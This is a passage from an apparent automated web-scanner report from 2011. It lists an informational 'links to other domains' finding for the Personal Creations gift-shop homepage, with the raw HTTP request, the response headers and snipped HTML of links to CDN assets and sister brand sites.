...[SNIP]...
er Your Email Here
                   " id="_ctl11__ctl0_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" />
<img onclick="SetEmailEntryUrl()" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif" alt="Sign Up for Email Savings" border="0" />
</div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="margin-left:5px;margin-top:-1px;vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=pcr">My Account</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=pcr">Order Tracking</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=pcr">Reminder Service</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/Careers_Overview.aspx">Careers</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/privacy.aspx">Privacy & Security</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/terms.aspx">Terms Of Use</a>
...[SNIP]...
<li><a border="0" href="http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm" target="_blank">View Catalog Online</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf" target="_blank">Apparel Size Charts</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf" target="_blank">Ring Size Charts</a>
...[SNIP]...
</p>
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:120px;"><img class="footerLogo_PFC" height=35px width=120px class="footerLogo_PFC" height="35px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:110px;"><img class="footerLogo_PLA" height=35px width=110px class="footerLogo_PLA" height="35px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:128px;"><img class="footerLogo_PFCint" height=35px width=128px class="footerLogo_PFCint" height="35px" width="128px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:151px;"><img class="footerLogo_RED" height=35px width=151px class="footerLogo_RED" height="35px" width="151px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:160px;"><img class="footerLogo_CMF" height=35px width=160px class="footerLogo_CMF" height="35px" width="160px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
...[SNIP]...
life...s special occasions." border="0" href="http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:177px;"><img class="footerLogo_PCR" height="35px" width="177px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:83px;"><img class="footerLogo_SHB" height=35px width=83px class="footerLogo_SHB" height="35px" width="83px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="OtherBrands XSmallSize">
           Other Liberty Media Brands and Services:
           <a id="_ctl11__ctl0_FooterLink_berries" href="http://www.berries.com/">Hand-Dipped Strawberries</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<br/><a class="Underlined" onclick="" href="http://www.facebook.com/personalcreations">Personal Creations Facebook</a><br/><a class="Underlined" onclick="" href="http://twitter.com/pcgifts">Personal Creations Twitter</a><br/><a class="Underlined" onclick="" href="http://www.linkedin.com/company/personal-creations">Personal Creations Linked-In</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...

18.28. http://www.personalcreations.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=5b1tcam4moanebn2ew35o5kq; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=5b1tcam4moanebn2ew35o5kq; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-2,xtc-1,ttb-3,nte-3,ntc-2,ntb-1,xta-1,trf-1,tpp-4,tbc-1,ntd-2,tvc-2,tmm-1,xtb-1,tnp-1,tpf-1; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:02 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-3,tkt-1,thp-2,txb-2,tks-2,tms-2,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:02 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=26; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:02 GMT; path=/
Set-Cookie: PCR_BrowserId=1acd96e4-8708-42f9-9d79-381b418823c3; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:48:02 GMT
Content-Length: 168281


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<li id="proFlowerLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
="nofollow" href="http://www.personalcreations.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
="nofollow" href="http://www.personalcreations.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>


<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico"/>

<div id="Header">
...[SNIP]...
ersonal Creations Homepage" href="http://www.personalcreations.com/sitemap.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:78px;width:212px;"><img height="78px" width="212px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Personal Creations Homepage" border="0" /></a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=PCR">Your Account</a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=PCR">Order Tracking</a>
...[SNIP]...
_ctl9__ctl8_lkCart" class="SecondaryColor HeaderLink" href="http://gifts.personalcreations.com/ShoppingCart.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme"><img style="border:0 none;" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Shopping Cart" />&nbsp;&nbsp;shopping cart&nbsp;0</a>
...[SNIP]...
<div class="headerTextMsg"> <img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_FreePersTest_186x47_HeaderMsg.gif" border="0" /> </div>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<a href="javascript:O_LC();"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/berries/siteimages/SiteFeedback_sm.gif" border="0" width="9" height="9" style="margin-top:-1px;vertical-align:middle;" title="site feedback" /></a>
       </div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
f="http://www.personalcreations.com/ProductSearch.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:21px;width:41px;display:inline;float:left;"><img class="sch_smallGo" height="21px" width="41px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
" href="http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero1" target="_self"><img id="_ctl10_DHero_rptSlides__ctl0_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_HAL11_SIT_04.jpg" alt="Shop Bestselling Halloween Gifts" border="0" /></a>
...[SNIP]...
" href="http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero2" target="_self"><img id="_ctl10_DHero_rptSlides__ctl1_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_CHR11_SIT_01.jpg" alt="Shop Bestselling Christmas Gifts" border="0" /></a>
...[SNIP]...
f="http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero3" target="_self"><img id="_ctl10_DHero_rptSlides__ctl2_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_B2S11_SIT_04.jpg" alt="Shop Bestselling Back to School Gifts" border="0" /></a>
...[SNIP]...
"0" href="http://www.personalcreations.com/personalized-wedding-gifts-PWEDBSL?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero4" target="_self"><img id="_ctl10_DHero_rptSlides__ctl3_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_WED11_SIT_03.jpg" alt="Shop Bestselling Wedding Gifts" border="0" /></a>
...[SNIP]...
border="0" href="http://www.personalcreations.com/clearance-sale-PCLEARA?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_topHeroPod" target="_self"><img id="_ctl10_TopPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_SAL11_SIT_02.gif" alt="Shop Our Clearance Sale" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
"http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_bottomHeroPod" target="_self"><img id="_ctl10_BottomPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_RightTopHeroPod_Birthday.jpg" alt="Shop Bestselling Birthday Gifts" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
owers/Dancing-Ghost-Figurine-30055810?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Dancing Ghost Figurine" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Small-Pumpkins-30020318?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Small Pumpkins" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/Halloween-Character-Doormat-30028425?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Halloween Character Doormat" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
en-Baskets---FREE-Safety-Kit-30056233?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Leggy Halloween Baskets + FREE Safety Kit" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
.com//House-of-Horrors-Slate-30030176?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="House of Horrors Slate" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
